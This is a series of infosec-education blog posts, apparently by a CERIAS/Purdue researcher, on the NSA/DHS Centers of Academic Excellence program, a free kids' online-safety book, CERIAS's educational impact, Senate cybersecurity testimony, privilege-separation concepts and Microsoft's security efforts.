Posts in Infosec Education

Centers of ... Adequacy, Revisited

Almost two years ago I wrote in this blog about how CERIAS (and Purdue) was not going to resubmit for the NSA/DHS Centers of Academic Excellence program.

Some of you may notice that Purdue is listed among this year's (2010) group of educational institutions receiving designation as one of the CAEs in that program. Specifically, we have received designation as a CAE-R (Center of Academic Excellence in Research).

"What changed?" you may ask, and "Why did you submit?"

The simple answers are "Not that much," and "Because it was the least-effort solution to a problem." Slightly more elaborate answers follow. (It would help if you read the previous post on this topic to put what follows in context.)

Basically, the first three reasons I listed in the previous post still hold:

  1. The CAE program is still not a good indicator of real excellence. The program now has 125 designated institutions, ranging from top research universities in IA (e.g., Purdue, CMU, Georgia Tech) to 2-year community colleges. To call all of those programs "excellent" and to suggest they are equivalent in a meaningful way is unfair to students who wish to enter the field, and unfair to the people who work at all of those institutions. I have no objection to labeling the designation as a high-level evaluation of competence, but "excellence" is still not appropriate.
  2. The CNSS standards are still used for the CAE and are not really appropriate for the field as it currently stands. Furthermore, the IACE program used to certify CNSS compliance explicitly notes: "The certification process does not address the quality of the presentation of the material within the courseware; it simply ensures that all the elements of a specific standard are included." How the heck can a program be certified as "excellent" when the quality is not addressed? By that measure, a glass of water is insufficient, but drowning someone under 30ft of water is "excellent."
  3. There still are no dedicated resources for CAE schools. There are several grant programs and scholarships via NSF, DHS and DOD for which CAE programs are eligible, but most of those don't actually require CAE status, nor does CAE status provide special consideration.

What has changed is the level of effort needed to apply for or renew at least the CAE-R stamp. The designation is now good for 5 academic years, and that is progress. Also, the requirements for the CAE-R designation were easily satisfied by a few people in a matter of several hours mining existing literature and research reports. Both of those were huge pluses for us in submitting the application and reducing the overhead to a more acceptable level given the return on investment.

The real value in this, and the reason we entered into the process, is that a few funding opportunities have indicated that applicants' institutions must be certified as a CAE member or else the applicant must document a long list of items to show "equivalence." As our faculty and staff compete for some of these grants, the cost-benefit tradeoff suggested having a small group go through the process once, for the CAE-R. Of course, this raises the question of why the funding agencies suggest that XX Community College is automatically qualified to submit a grant, while a major university that is not CAE certified (MIT is an example) has to prove that it is qualified!

So, for us, it came down to a matter of deciding whether to stay out of the program as a matter of principle, or submit an application to make life a little simpler for all of our faculty and staff when submitting proposals. In the end, several of our faculty & staff decided to do it over an afternoon because they wanted to make their own proposals simpler to produce. And, our attempt to galvanize some movement away from the CAE program produced huge waves of ...apathy... by other schools; they appear to have no qualms about standing in line for government cheese. Thus, with somewhat mixed feelings by some of us, we got our own block of curd, with an expiration date of 2015.

Let me be very clear -- we are very supportive of any faculty willing to put in the time to develop a program, and working to educate students to enter this field. We are also very glad that there are people in government who are committed to supporting that academic effort. We are in no way trying to denigrate any institution or individual involved in the CAE program. But the concept of giving a gold star to make everyone feel good about doing what should be the minimum isn't how we should be teaching, or how we should be promoting good cybersecurity education.

(And I should also add that not every faculty member here holds the opinions expressed above.)

Own Your Own Space

I have been friends with Linda McCarthy for many years. As a security strategist she has occupied a number of roles -- running research groups, managing corporate security, writing professional books, serving as a senior consultant, conducting professional training....and more. That she isn't widely known is more a function of her not seeking publicity by having a blog or publishing derivative hacks to software than it is anything else; there are many in the field who are highly competent and who practice out of the spotlight most of the time.

One of Linda's passions over the last few years has been in reaching out to kids -- especially teens -- to make them aware of how to be safe when online. Her most recent effort is an update to her book for the youngest computer users. The book is now published under the Creative Commons license. The terms allow free use of the book for personal use. That's a great deal for a valuable resource!

I'm enclosing the recent press release on the book to provide all the information on how to get the book (or selected chapters).

If you're an experienced computer user, this will all seem fairly basic. But that's the point -- the basics require special care to present to new users, and in terms they understand. (And yes, this is targeted mostly to residents of the U.S.A. and maybe Canada, but the material should be useful for everyone, including parents.)

Industry-Leading Internet Security Book for Kids, Teens, Adults Available Now as Free Download

Own Your Space® teams with Teens, Experts, Corporate Sponsors for Kids' Online Safety

SAN FRANCISCO, June 17 -- As unstructured summertime looms, kids and teens across the nation are likely to be spending more time on the Internet and texting.

Now, a free download is available to help them keep themselves safer both online and while using a cell phone.

Own Your Space®, the industry-leading Internet security book for youth, parents, and adults, was first written by Linda McCarthy, a 20-year network and Internet-security expert.

This all-new free edition -- by McCarthy, security pros, and dedicated teenagers -- teaches youths and even their parents how to keep themselves "and their stuff" safer online.

A collaboration between network-security experts, teenagers, and artists, the flexible licensing of Creative Commons, and industry-leading corporate sponsors, together have made it possible for everyone on the Internet to access Own Your Space for free via myspace.com/ownyourspace, facebook.com/ownyourspace.net, and www.ownyourspace.net.

"With the rise of high-technology communications within the teen population, this is the obvious solution to an increasingly ubiquitous problem: how to deliver solid, easy-to-understand Internet security information into their hands? By putting it on the Internet and their hard drives, for free," said Linda McCarthy, former Senior Director of Internet Safety at Symantec.

Besides the contributors' own industry experience, Own Your Space also boasts the "street cred" important to the book's target audience; this new edition has been overseen by a cadre of teens who range in age from 13 to 17.

"In this age of unsafe-Internet and risky-texting practices that have led to the deaths and the jailing of minors, I'm thankful for everyone who works toward and sponsors our advocacy to keep more youth safe while online and on cell phones," McCarthy said.

Everyone interested in downloading Own Your Space® for free can visit myspace.com/ownyourspace, facebook.com/ownyourspace.net, and www.ownyourspace.net. Corporations who would like to increase the availability of the book and promote child safety online through their hardware and Web properties can contact Linda McCarthy at lmccarthy@ownyourspace.net.

McCarthy is releasing the book in June to celebrate Internet Safety Month.

Having an Impact on Cybersecurity Education

The 12th anniversary of CERIAS is looming (in May). As part of the display materials for our fast-approaching annual CERIAS Symposium (register now!), I wanted to get a sense of the impact of our educational activities in addition to our research. What I found surprised me -- and may surprise many others!

Strategic Planning

Back in 1997, a year before the formation of CERIAS, I presented testimony before a U.S. House of Representatives hearing on "Secure Communications." For that presentation, I surveyed peers around the country to determine something about the capacity of U.S. higher education in the field of information security and privacy (this was before the term "cyber" was popularized). I discovered that, at the time, there were only four defined programs in the country. We estimated that there were fewer than 20 academic faculty in the US at that time who viewed information security other than cryptography as their primary area of emphasis. (The reason we excluded cryptography was that there were many people working in abstract mathematics that could be applied to cryptography but who knew extremely little about information security as a field, and certainly were not teaching it.)

The best estimate I could come up with from surveying all those people was that, as of 1997, U.S. higher education was graduating only about three new Ph.D. students a year in information security. Thus, there were also very few faculty producing new well-educated experts at any level, and too small a population to easily grow new programs. I noted in my remarks that the output was too low by at least two orders of magnitude for national needs (and was at least 3-5 orders too low for international needs).

As I have noted before, my testimony helped influence the creation of (among other things) the NSA's CAE program and the Scholarship for Service program. Both provided some indirect support for increasing the number of Ph.D. graduates and courses at all postsecondary levels. The SfS has been a qualified success; the CAE program, not so much.

When CERIAS was formed, one element of our strategic plan was to focus on helping other institutions build up their capacity to offer infosec courses at every level, as a matter of strategic leadership. We decided to do this through five concurrent approaches:

  1. Create new classes at every level at Purdue, across several departments
  2. Find ways to get more Ph.D.s through our program, and help place them at other academic institutions
  3. Host visitors and postdocs, and provide them with additional background in the field for eventual use at other academic institutions
  4. Create an affiliates program with other universities and colleges to exchange educational materials, speakers, best practices, and more
  5. Create opportunities for enrichment programs for faculty at other schools, such as a summer certificate program for educators at 2 and 4-year colleges.

Our goal was not only to produce new expertise, but to retrain personnel with strong backgrounds in computing and computing education. Transformation was the only way we could see that a big impact could be made quickly.

Outcome

We have had considerable success at all five of these initiatives. Currently, there are several dozen classes in CERIAS focus areas across Purdue. In addition to the more traditional graduate degrees, our Interdisciplinary graduate degree program is small but competitive and has led to new courses. Overall, on the Ph.D. front, we anticipate another 15 Ph.D. grads this May, bringing the total CERIAS output of Ph.D.s over 12 years to 135. To the best of our ability to estimate (using some figures from NSF and elsewhere), that was about 25% of all U.S. Ph.D.s in the field during the first decade that CERIAS was in existence, and we are currently graduating about 20% of U.S. output. Many of those graduates have taught or still teach at colleges and universities, even if part-time. We have also graduated many hundreds of MS and undergrad students with some deep coursework and research experience in information security and privacy issues.

We have hosted several score post-docs and visiting faculty over the years, and always welcome more -- our only limitation right now is available funding. For several years, we had an intensive summer program for faculty from 2 and 4-year schools, many of which serve minority and disadvantaged populations. Graduates of that program went on to create many new courses at their home institutions. We had to discontinue this program after a few years because of, again, lack of funding.

Our academic affiliates program ran for five years, and we believe it was a great success. Several schools with only one or two faculty working in the area were able to leverage the partnership to get grants and educational resources, and are now notable for their own intrinsic capabilities. We discontinued the affiliates program several years ago as we realized all but one of those partners had "graduated."

So, how can we measure the impact of this aspect of our strategic plan? Perhaps by simply coming up with some numbers....

We compiled a list of anyone who had been through CERIAS (and a few years of COAST, prior) who:

  • Got a PhD from within Purdue and was part of CERIAS
  • Did a postdoc with CERIAS to learn (more) about cybersecurity/privacy
  • Came as a visiting faculty member to learn (more) about cybersecurity/privacy
  • Participated in one of our summer institutes for faculty

We gathered from them (as many as we could reach) the names of any higher education institution where they taught courses related to security, privacy or cyber crime. We also folded in the names of our academic affiliates at which such courses were (or still are) offered. The resultant list has over 100 entries! Even if we make a moderate estimate of the number of people who took these classes, we are well into the tens of thousands of students impacted, in some way, and possibly above 100,000, worldwide. That doesn't include the indirect effect, because many of those students have gone on (or will go on) to teach in higher education -- some of our Ph.D. grads have already turned out Ph.D. grads who now have their own Ph.D. students!

Seeing the scope of that impact is gratifying. And knowing that we will do more in the years ahead is great motivation, too.

Of course, it is also a little frustrating, because we could have done more, and more needs to be done. However, the approaches we have used (and are interested in trying next) never fit into any agency BAA. Thus, we have (almost) never been able to get grant support for our educational efforts. And, in many cases, the effort, overhead and delays in the application processes aren't worth the funding that is available. (The same is true of many of our research and outreach activities, but that is a topic for another time.)

We've been able to get this far because of the generosity of the companies and agencies that have been CERIAS general supporters over the years -- thank you! Our current supporters are listed on the CERIAS WWW site (hint: we're open to adding more!). We've also had a great deal of support within Purdue University from faculty, staff and the administration. It has been a group effort, but one that has really made a positive difference in the world....and provides us motivation to continue to greater heights.

See you at the CERIAS Symposium!

Institutions

Here is the list of the 108 educational institutions [last updated 3/21, 1600 EDT]:

  • Air Force Institute of Technology
  • Amrita Vishwa Vidyapeetham, Coimbatore, India
  • Brigham Young University
  • Cairo University (Egypt)
  • California State University Sacramento
  • California State University Long Beach
  • Carnegie Mellon University
  • Case Western Reserve University
  • Charleston Southern University
  • Chungnam National University, Korea
  • College of Aeronautical Engineering, PAF Academy, Risalpur Pakistan
  • College of Saint Elizabeth
  • Colorado State University
  • East Tennessee State University
  • Eastern Michigan University
  • Felician College
  • George Mason University
  • Georgia Institute of Technology
  • Georgia Southern University
  • Georgetown University
  • Hannam University, Korea
  • Helsinki University of Technology (Finland)
  • Hong Kong University of Science & Technology
  • Illinois Wesleyan University
  • Indian Institute of Science, Bangalore
  • Indiana University-Purdue University, Fort Wayne
  • Indiana University-Purdue University, Indianapolis
  • International University, Bruchsal, Germany
  • Iowa State University
  • James Madison University
  • John Marshall School of Law
  • KAIST (Korea Advanced Institute of Science and Technology)
  • Kansas State University
  • Kennesaw State University
  • Kent State University
  • Korea University
  • Kyungpook National University, Korea
  • Linköpings Universitet, Linköping Sweden
  • Marquette University
  • Miami University of Ohio
  • Missouri Univ S&T
  • Murray State University
  • Myongji University, Korea
  • N. Georgia College & State Univ.
  • National Chiao Tung University, Taiwan
  • National Taiwan University
  • National University of Singapore
  • New Jersey Institute of Technology
  • North Carolina State University
  • Norwalk Community College
  • Oberlin College
  • Penn State University
  • Purdue University Calumet
  • Purdue University West Lafayette
  • Qatar University, Qatar
  • Queensland Institute of Technology, Australia
  • Radford University
  • Rutgers University
  • Sabanci University, Turkey
  • San José State University
  • Shoreline Community College
  • Simon Fraser University
  • Southwest Normal University (China)
  • Southwest Texas Junior College
  • SUNY Oswego
  • SUNY Stony Brook
  • Syracuse University
  • Technische Universität München (TU-Munich)
  • Texas A & M Univ. Corpus Christi
  • Texas A & M Univ. Commerce
  • Tuskegee University
  • United States Military Academy
  • Universidad Católica Boliviana San Pablo, Bolivia
  • Universität Heidelberg, Heidelberg, Germany
  • University of Albany
  • University of Calgary
  • University of California, Berkeley
  • University of Cincinnati
  • University of Connecticut
  • University of Dayton
  • University of Denver
  • University of Florida
  • University of Kansas
  • University of Louisville
  • University of Maine at Fort Kent
  • University of Maryland University College
  • University of Mauritius, Mauritius
  • University of Memphis
  • University of Milan, Italy
  • University of Minnesota
  • University of Mississippi
  • University of New Haven (CT)
  • University of New Mexico
  • University of North Carolina, Charlotte
  • University of Notre Dame
  • University of Ohio
  • University of Pittsburgh
  • University of Texas, Dallas
  • University of Texas, San Antonio
  • University of Trento (Italy)
  • University of Virginia
  • University of Washington
  • University of Waterloo
  • University of Zurich
  • Virginia Tech
  • Washburn University
  • Western Michigan University
  • Zayed University, UAE

What About the Other 11 Months?

October is "officially" National Cyber Security Awareness Month. Whoopee! As I write this, only about 27 more days before everyone slips back into their cyber stupor and ignores the issues for the other 11 months.

Yes, that is not the proper way to look at it. The proper way is to look at the lack of funding for long-term research, the lack of meaningful initiatives, the continuing lack of understanding that robust security requires actually committing resources, the lack of meaningful support for education, almost no efforts to support law enforcement, and all the elements of "Security Theater" (to use Bruce Schneier's very appropriate term) put forth as action, only to realize that not much is going to happen this month, either. After all, it is "Awareness Month" rather than "Action Month."

There was a big announcement at the end of last week where Secretary Napolitano of DHS announced that DHS had new authority to hire 1000 cybersecurity experts. Wow! That immediately went on my list of things to blog about, but before I could get to it, Bob Cringely wrote almost everything that I was going to write in his blog post The Cybersecurity Myth - Cringely on technology. (NB. Similar to Bob's correspondent, I have always disliked the term "cybersecurity" that was introduced about a dozen years ago, but it has been adopted by the hoi polloi akin to "hacker" and "virus.") I've testified before the Senate about the lack of significant education programs and the illusion of "excellence" promoted by DHS and NSA -- you can read those to get my bigger picture view of the issues on personnel in this realm. But, in summary, I think Mr. Cringely has it spot on.

Am I being too cynical? I don't really think so, although I am definitely seen by many as a professional curmudgeon in the field. This is the 6th annual Awareness Month and things are worse today than when this event was started. As one indicator, consider that the funding for meaningful education and research has hardly changed. NITRD (National Information Technology Research & Development) figures show that the fiscal 2009 allocation for Cyber Security and Information Assurance (their term) was about $321 million across all Federal agencies. Two-thirds of this amount is in budgets for Defense agencies, with the largest single amount to DARPA; the majority of these funds have gone to the "D" side of the equation (development) rather than fundamental research, and some portion has undoubtedly gone to support offensive technologies rather than building safer systems. This amount has perhaps doubled since 2001, although the level of crime and abuse has risen far more -- by at least two orders of magnitude. The funding being made available is a pittance and not enough to really address the problems.

Here's another indicator. A recent conversation with someone at McAfee revealed that new pieces of deployed malware are being indexed at a rate of about 10 per second -- and those are only the ones detected and being reported! Some of the newer attacks are incredibly sophisticated, defeating two-factor authentication and falsifying bank statements in real time. The criminals are even operating a vast network of fake merchant sites designed to corrupt visitors' machines and steal financial information.   Some accounts place the annual losses in the US alone at over $100 billion per year from cyber crime activities -- well over 300 times everything being spent by the US government in R&D to stop it. (Hey, but what's 100 billion dollars, anyhow?) I have heard unpublished reports that some of the criminal gangs involved are spending tens of millions of dollars a year to write new and more effective attacks. Thus, by some estimates, the criminals are vastly outspending the US Government on R&D in this arena, and that doesn't count what other governments are spending to steal classified data and compromise infrastructure. They must be investing wisely, too: how many instances of arrests and takedowns can you recall hearing about recently?

Meanwhile, we are still awaiting the appointment of the National Cyber Cheerleader. For those keeping score, the President announced that the position was critical and he would appoint someone to that position right away. That was on May 29th. Given the delay, one wonders why the national cyber review was mandated to be completed in a rushed 60-day period. As I noted in that earlier posting, an appointment is unlikely to make much of a difference as the position won't have real authority. Even with an appointment, there is disagreement about where the lead for cyber should be, DHS or the military. Neither really seems to take into account that this is at least as much a law enforcement problem as it is one of building better defenses. The lack of agreement means that the tenure of any appointment is likely to be controversial and contentious at worst, and largely ineffectual at best.

I could go on, but it is all rather bleak, especially when viewed through the lens of my 20+ years of experience in the field. The facts and trends have been well documented for most of that time, too, so it isn't as if this is a new development. There are some bright points, but unless the problem gets a lot more attention (and resources) than it is getting now, the future is not going to look any better.

So, here are my take-aways for National Cyber Security Awareness:

  • the government is more focused on us being "aware" than "secure"
  • the criminals are probably outspending the government in R&D
  • no one is really in charge of organizing the response, and there isn't agreement about who should
  • there aren't enough real experts, and there is little real effort to create more
  • too many people think "certification" means "expertise"
  • law enforcement in cyber is not a priority
  • real education is not a real priority

But hey, don't give up on October! It's also Vegetarian Awareness Month, National Liver Awareness Month, National Chiropractic Month, and Auto Battery Safety Month (among others). Undoubtedly there is something to celebrate without having to wait until Halloween. And that's my contribution for National Positive Attitude Month.

This time, the Senate

On March 19, I had an opportunity to testify before the Senate Committee on Commerce, Science, and Transportation. The hearing was entitled Cybersecurity -- Assessing Our Vulnerabilities and Developing An Effective Defense.

I was asked to include information on research problems, educational initiatives, and issues regarding the current state of cyber security in the nation.   As is usual for such things, the time between the invitation and the due date for written testimony was short. Thus, I didn't have the time to delve deeply into the topic areas, but could only address the things that I already had on hand -- including some posts from this blog that I had written before. The result was a little longer than the other statements, but I think I covered more ground.

One hint for people testifying before Congress on such things: you can't depend on how long you will have for spoken remarks, so be sure any points you want to make are in your written testimony. In this case, the hearing was limited to about 75 minutes because there were several votes scheduled on the Senate floor, and the committee needed to adjourn to allow the Senators to attend the votes. And, as is common for too many hearings, there weren't many of the committee members present; I believe the hearing began with only two of the 25 members present, with some movement of members in and out reaching a maximum of four seated at any one time. In this case, the chair (Senator Jay Rockefeller of West Virginia) apologized to us several times for the low turnout. However, many (all?) of the staff and aides were present, so I'm certain the gist of the testimony presented will be considered.

The Senator made a nice introductory statement.

My written testimony is available on my website as well as the committee site. My oral statement was from rough notes that I modified on the fly as I listened to the other testimony (by Jim Lewis, Eric Weiss and Ed Amoroso). That statement, and the whole hearing, are available via the archived hearing webcast (my remarks start at about 46:30 into the webcast). If I get a transcribed version of those remarks, I will post them along with my written testimony on my website in the "US government" section.

Comments by the other speakers were good overall and I think we collectively covered a lot of ground. The questions from the Senators present indicated that they were listening and knew some of the problems in the area. The comments from Senator Nelson about the intrusions into his systems were surprising: several Senate security staff were present at the hearing and indicated to me that his remarks were the first they had heard of the incidents! So, the hearing apparently set off an incident-response exercise -- separate from responding to my presence in the building, that is. grin

Will this hearing make a difference? I don't know. I've been testifying and saying the same things for over a dozen years (this was my 8th Congressional hearing testimony) and things haven't gotten that much better...and may even be worse. Senator Rockefeller has indicated he intends to introduce legislation supporting more funding for students studying cyber security issues. There was some good news coverage of all this (e.g., FCW and CNet).

I am told that there will be more hearings by this committee. Some House committees have been holding hearings too, and the President's 60 day review continues apace. The added attention is great, but with the sudden interest by so many, the result may be more confusion rather than resolution.

Stay tuned.




As a reminder, if you want to know about my occasional postings such as this but don't want to subscribe to the RSS feed,  you can subscribe to the mailing list.

Also as a reminder, there is my tumble blog on security issues, with links to items on the news and WWW of possible interest to those who find my ramblings and rants of interest.

Centers of Academic .... Adequacy

History

Back in 1997, the year before CERIAS was formally established, I testified before Congress on the state of cyber security in academia. In my testimony, I pointed out that there were only four established research groups, and their combined, yearly PhD production was around 3 per year, not counting cryptography.

Also in that testimony, I outlined that support was needed for new centers of expertise, and better support of existing centers.

As a result of that testimony, I was asked to participate in some discussions with staff from OSTP, from some Congressional committees (notably, the House Science Committee), and Richard Clarke‘s staff in the Executive Office of the President. I was also invited to some conversations with leadership at the NSA, including the deputy director for information security systems (IAD) (Mike Jacobs). Those discussions were about how to increase the profile of the area, and get more people educated in information security.

Among the ideas I discussed were ones expanded from my testimony. They eventually morphed into the Scholarship for Service program, the NSF CyberTrust program, and the NSA Centers of Academic Excellence (CAE). [NB. I am not going to claim sole or primary credit for these programs. I know I came up with the ideas, briefed people about them, discussed pros & cons, and then those groups took them and turned them into what we got. None of them are quite what I proposed, but that is how things happen in DC.]

The CAE program was established by the NSA in late 1998. The CAE certification was built around courses meeting CNSS requirements. Purdue was one of the first seven universities certified as CAEs, in May of 1999. We remained in the CAE program until earlier this year (2008). In 2003, DHS became a co-sponsor of the program.

Why Purdue is No Longer a CAE

In 2007, we were informed that unless we renewed our CNSS certifications by the end of August, we would not be eligible for CAE renewal in 2008. This prompted discussion and reflection by faculty and staff at CERIAS. As noted above, the mapping of CNSS requirements to our classes is non-trivial. The CAE application was also non-trivial. None of our personnel were willing to devote the hours of effort required to do the processing. Admittedly, we could have “faked” some of the mapping (as we know some schools have done in the past), but that was never an option for us. We had other objections, too (see what follows). As a result, we did not renew the certifications, and we dropped out of the CAE program when our certification expired earlier this year.

Our decision was not made lightly—we nearly dropped out in 2004 when we last renewed (and were not grandfathered into the new 5-year renewal cycle, much to our annoyance), and there was continuing thought given to this over the intervening years. We identified a number of issues with the program, and the overhead of the mapping and application process was not the only (or principal) issue.

First, and foremost, we do not believe it is possible to have 94 (most recent count) Centers of Excellence in this field. After the coming year, we would not be surprised if the number grew to over 100, and that is beyond silly. There may be at most a dozen centers of real excellence, and pretending that the ability to offer some courses and stock a small library collection means “excellence” isn’t candid.

The program at this size is actually a Centers of Adequacy program. That isn’t intended to be pejorative—it is simply a statement about the size of the program and the nature of the requirements.

Some observers and colleagues outside the field have looked at the list of schools and made the observation that there is a huge disparity among the capabilities, student quality, resources and faculties of some of those schools. Thus, they have concluded, if those schools are all equivalent as “excellent” in cyber security, then that means that the good ones can’t be very good (“excellent” means defining the best, after all). So, we have actually had pundits conclude that cyber security & privacy studies can’t be much of a discipline. That is a disservice to the field as a whole.

Instead of actually designating excellence, the CAE program has become an ersatz certification program. The qualifications to be met are for minimums, not for excellence. In a field with so few real experts and so little money for advanced efforts, this is understandable given one of the primary goals of the CAE program—to encourage schools to offer IA/IS programs. Thus, the program sets a relatively low bar and many schools have put in efforts and resources to meet those requirements. This is a good thing, because it has helped raise the awareness of the field. However, it currently doesn’t set a high enough bar to improve the field, nor does it offer the resources to do so.

Setting a low bar also means that academic program requirements are being heavily influenced by a government agency rather than the academic community itself. This is not good for the field because it means the requirements are being set based on particular application need (of the government) rather than the academic community’s understanding of foundations, history, guiding principles, and interaction with other fields. (E.g., Would your mathematics department base its courses on what is required to produce IRS auditors? We think not!) In practice, the CAE program has probably helped suppress what otherwise would be a trend by our community to discuss a formal, common curriculum standard. In this sense, participation in the CAE program may now be holding us back.

Second, and related, the CNSS standards are really training standards, and not educational standards. Some of them might be met by a multi-day class taught by a commercial service such as SANS or CSI—what does that say about university-level classes we map to them? The original CNSS intent was to provide guidance for the production of trained system operators—rather than the designers, researchers, thinkers, managers, investigators and more that some of our programs (and Purdue’s, in particular) are producing.

We have found the CNSS standards to be time-consuming to map to courses, and in many cases a poor fit for the material we teach, and therefore inappropriate for our students. Tellingly, in 9 years we have never had a single one of our grads ask us for proof that they met the CNSS standards because an employer cared! We don’t currently intend to offer courses structured around any of the CNSS standards, and it is past the point where we are interested in supporting the fiction that they are central to a real curriculum.

Third, we have been told repeatedly over the years that there might be resources made available for CAE schools if only we participated. It has never happened. The Scholarship for Service program is open to non-CAE schools (read the NSF program solicitation carefully), so don’t think of that as an example. With 100 schools, what resources could reasonably be expected? If the NSA or DHS got an extra $5 million, and they spread it evenly, each would get $50,000. Take out institutional overhead charges, and that might be enough for 1 student scholarship…if that. If there were 10 schools, then $500,000 each is an amount that might begin to make a difference. But over a span of nearly 10 years the amount provided has been zero, and any way you divide that, it doesn’t really help any of us. Thus, we have been investing time and energy in a program that has not brought us resources to improve. Some investment of our energy & time to bolster community was warranted, but that time is past.

Fourth, the renewal process is a burden because of the nature of university staffing and the time required. With no return on getting the designation, we could not find anyone willing to invest the time for the renewal effort.

Closing Comments

In conclusion, we see the CAE effort as valuable for smaller schools, or those starting programs. By having the accreditation (which is what this is, although it doesn’t meet ISO standards for such), those programs can show some minimal capabilities, and perhaps obtain local resources to enhance them. However, for major programs with broader thrusts and a higher profile, the CAE has no real value, and may even have negative connotations. (And no, the new CAE-R program does not solve this as it is currently structured.)

The CAE program is based on training standards (CNSS) that do not have strong pedagogical foundations, and this is also not appropriate for a leading educational program. As the field continues to evolve over the next few years, faculty at CERIAS at Purdue expect to continue to play a leading role in shaping a real academic curriculum. That cannot be done by embracing the CAE.

We are confident that people who understand the field are not going to ignore the good schools simply because they don’t have the designation, any more than people have ignored major CS programs because they do not have CSAB accreditation. We’ve been recognized for our excellence in research, we continue to attract and graduate excellent students, and we continue to serve the community. We are certain that people will recognize that and respond accordingly.

More importantly, this goes to the heart of what it means to be “trustworthy.” Security and privacy issues are based on a concept of trust, and that also implies honesty. It simply is not honest to continue to participate in (and thereby support) a designation that is misleading. There are not 94 centers of excellence in information and cyber security in the US. You might ask the personnel at some of the schools that are so designated why they feel the need to participate and shore up that unfortunate canard.


Confusion of Separation of Privilege and Least Privilege

Least privilege is the idea of giving a subject or process only the privileges it needs to complete a task.  Compartmentalization is a technique to separate code into parts on which least privilege can be applied, so that if one part is compromised, the attacker does not gain full access.  Why does this get confused all the time with separation of privilege?  Separation of privilege is breaking up a *single* privilege amongst multiple, independent components or people, so that agreement among multiple parties, or collusion, is necessary to perform an action (e.g., dual signature checks).  So, if an authentication system has various biometric components, a component that evaluates a token, and another component that evaluates some knowledge or capability, and all have to agree for authentication to occur, then that is separation of privilege.  It is essentially an “AND” logical operation; in its simplest form, a system would check several conditions before granting approval for an operation.  Bishop uses the example of “su” or “sudo”: a user (or attacker of a compromised process) needs to know the appropriate password, and the user needs to be in a special group.  A related, but not identical, concept is that of majority voting systems.  Redundant systems have to agree, hopefully outvoting a defective system.  If there were no voting, i.e., if all of the systems always had to agree, it would be separation of privilege.  OpenSSH’s UsePrivilegeSeparation option is *not* an implementation of separation of privilege by that definition; it simply runs compartmentalized code using least privilege on each compartment.
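As a rough illustration of that “AND,” here is a minimal Python sketch (mine, not taken from any particular system; the user records and check functions are hypothetical stand-ins): the single privilege of logging in is granted only if every independent check passes, so compromising one factor is not enough.  Least privilege and compartmentalization, by contrast, concern what a component is allowed to do, not how many parties must agree.

```python
# Minimal sketch of separation of privilege (illustrative only; a real system
# would never store secrets in a plaintext dict like this).
USERS = {
    "alice": {"fingerprint": "fp-123", "token": "654321", "password": "s3cret"},
}

def biometric_matches(user, scan):          # something you are
    return USERS.get(user, {}).get("fingerprint") == scan

def token_is_valid(user, code):             # something you have
    return USERS.get(user, {}).get("token") == code

def password_is_correct(user, pw):          # something you know
    return USERS.get(user, {}).get("password") == pw

def authenticate(user, scan, code, pw):
    """Grant the single privilege (login) only if ALL independent checks agree."""
    return all((
        biometric_matches(user, scan),
        token_is_valid(user, code),
        password_is_correct(user, pw),
    ))

if __name__ == "__main__":
    print(authenticate("alice", "fp-123", "654321", "s3cret"))  # True: all checks pass
    print(authenticate("alice", "fp-123", "000000", "s3cret"))  # False: one factor fails
```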

What security push?

[tags]Vista, Windows, security,flaws,Microsoft[/tags]

Update: additions added 4/19 and 4/24, at the end.

Back in 2002, Microsoft performed a “security standdown” that Bill Gates publicly stated cost the company over $100 million.  That extreme measure was taken because of numerous security flaws popping up in Microsoft products, steadily chipping away at MS’s reputation, customer safety, and internal resources.  (I was told by one MS staffer that response to major security flaws often cost close to $1 million each for staff time, product changes, customer response, etc.  I don’t know if that is true, but the reality certainly was/is a substantial number.)

Without a doubt, people inside Microsoft took the issue seriously.  They put all their personnel through a security course, invested heavily in new testing technologies, and even went so far as to convene an advisory board of outside experts (the TCAAB)—including some who have not always been favorably disposed towards MS security efforts.  Security of the Microsoft code base suddenly became a Very Big Deal.

Fast forward 5 years: When Vista was released a few months ago, we saw lots of announcements that it was the most secure version of Windows ever, but that metric was not otherwise qualified; a cynic might comment that such an achievement would not be difficult.  The user population has become habituated to the monthly release of security patches for existing products, with the occasional emergency patch.  Bundling all the patches together undoubtedly helps reduce the overhead in producing them, but also serves to obscure how many different flaws are contained inside each patch set.  The number of flaws maybe hasn’t really decreased all that much from years ago.

Meanwhile, reports from inside MS indicate that there was no comprehensive testing of personnel to see how the security training worked and no follow-on training.  The code base for new products has continued to grow, thus opening new possibilities for flaws and misconfiguration.  The academic advisory board may still exist, but I can’t find a recent mention of it on the Microsoft web pages, and some of the people I know who were on it (myself included) were dismissed over a year ago.  The external research program at MSR that connected with academic institutions doing information security research seems to have largely evaporated—the WWW page for the effort lists John Spencer as contact, and he retired from Microsoft last year.  The upcoming Microsoft Research Faculty Summit has 9 research tracks, and none of them are in security.

Microsoft seems to project the attitude that they have solved the security problem.

If that’s so, why are we still seeing significant security flaws appear that not only affect their old software, but their new software written under the new, extra special security regime, such as Vista and Longhorn?  The ANI flaw and the recent DNS flaw are both glaring examples of major problems that shouldn’t have been in the current code: the ANI flaw is very similar to a years-old flaw that was already known inside Microsoft, and the DNS flaw is another buffer overflow!!  There are even reports that there may be dozens (or hundreds) of patches awaiting distribution for Vista.

Undoubtedly, the $100 million spent back in 2002 was worth something—the code quality has definitely improved.  There is greater awareness inside Microsoft about security and privacy issues.  I also know for a fact that there are a lot of bright, talented and very motivated people inside Microsoft who care about these issues.  But questions remain: did Microsoft get its money’s worth?  Did it invest wisely and if so, why are we still seeing so many (and so many silly) security flaws?  Why does it seem that security is no longer a priority?  What does that portend for Vista, Longhorn, and Office 2007?  (And if you read the “standdown” article, one wonders also about Mr. Nash’s posterior. grin )

I have great respect for many of the things Microsoft has done, and admiration for many of the people who work there.  I simply wish they had some upper management who would realize that security (and privacy) are ongoing process needs, not one-time problems to overcome with a “campaign.”

What do you think?

[posted with ecto]

Update 4/19: The TCAAB does still continue to exist, apparently, but with a greater focus on privacy issues than security.  I do not know who the current members might be.

Update 4/24: I have heard (informally) from someone inside Microsoft in response to this post.  He pointed out several issues that I think are valid and deserve airing here:

  1. Security training of personnel is on-going.  It still is unclear to me whether they are employing good educational methods, including follow-up testing, to optimize their instruction.
  2. The TCAAB does indeed continue (and was meeting when I made the original post!).  It has undergone some changes since it was announced, but is largely the same as when it was formed.  What they are doing, and what effect they are having (if any), is unclear.
  3. Microsoft’s patch process is much smoother now, and bundled patches are easier to apply than lots of individual ones.  (However, there are still a lot of patches for things that shouldn’t be in the code.)
